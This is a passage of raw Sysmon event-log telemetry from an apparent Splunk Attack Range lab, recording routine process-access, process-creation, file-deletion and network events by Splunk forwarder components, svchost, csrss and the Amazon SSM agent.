Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104705Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.703{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3CF-615A-FC01-00000000FC01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104704Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.704{58E9C193-B3CF-615A-FC01-00000000FC01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104703Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.500{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8290B88BFC7580C6F9A7DB67D0B802F5,SHA256=988AF0FF2795B29CC0E5D7C8B680E5A13A6DD001EB2E6031E5C3381BCE2A3C92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104702Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.422{58E9C193-B3CF-615A-FB01-00000000FC01}22806608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104701Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3CF-615A-FB01-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104700Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104699Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104698Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104697Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104696Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B3CF-615A-FB01-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104695Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.203{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3CF-615A-FB01-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104694Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:03.204{58E9C193-B3CF-615A-FB01-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082575Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:04.889{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3B03D2918EEC493741207B2D2A1EC92,SHA256=92636D37D6B0209B90E3143B9C2DE35F6370D75AF13FC59877E9B9E07795D6D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104720Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:04.563{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCDE03BE3BDD5FF38BAF9D8BF198AF2F,SHA256=273E74BCDBF2E218E9AFD71002DF750A7781AD0D8F609392A7EF4B29FEF2CFE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104719Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:04.203{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2AF90ED6D5FA76C1C5A852594513EE3,SHA256=F30F3DCF7CCAE16F4FC0134774B34051AA3183D5C673D2F87941676F4DB7B78D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104718Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:04.063{58E9C193-B3CF-615A-FC01-00000000FC01}64846892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082577Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:05.890{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D764B37C6033A4BDDAB9D091496AA53,SHA256=12CA6A23826778F69587834D6CB1FE4F8B260A29CA9736D1208C8142B8D0032D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104729Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.563{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=266064AC2A97C3DA5980BC0ED1039C31,SHA256=75653ADFB197DCBFC2C3558350DB40588FD49DFC6C59DFAB79FE3E92028D95F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082576Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:05.814{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-029MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104728Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3D1-615A-FD01-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104727Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104726Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104725Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104724Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104723Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B3D1-615A-FD01-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104722Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.344{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3D1-615A-FD01-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104721Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.345{58E9C193-B3D1-615A-FD01-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082579Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:06.903{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA6E139B45DEA2C504AE8BA3EF4A93BA,SHA256=4152B229564A1FD49FE32F680D86E6442F6E2726E118E124A847C3EA70E6FF38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104732Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:05.269{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51719-false10.0.1.12-8000- 23542300x8000000000000000104731Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:06.563{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F67781CFC4D56C169FAF5484D00A4D0D,SHA256=C8DEFC55E509C09C037993CCF9E7CB84651BC5D2BA4F555CB143AFAC5F71EBBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082578Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:06.813{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-030MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104730Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:06.344{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D785C5988A51B8B825A5F783282C695,SHA256=91D177CA2EA9C964D8FC788922C968928B591BA62D84551FCF773B00192AD1F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082580Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:07.905{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81A1D7F295971763B1C555CAE53F1BD7,SHA256=A4EAC692283626E099C74958ED49AADF3E978CF6AE02A2D8AAEBBA876DAF88F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104733Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:07.578{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20EDB83CFEEA01F031C56BF9967DBC9,SHA256=B0FF8D851570A9CA2903AE5687526C6D7B52A08CD963FC6A8BD0467C7402986E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082582Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 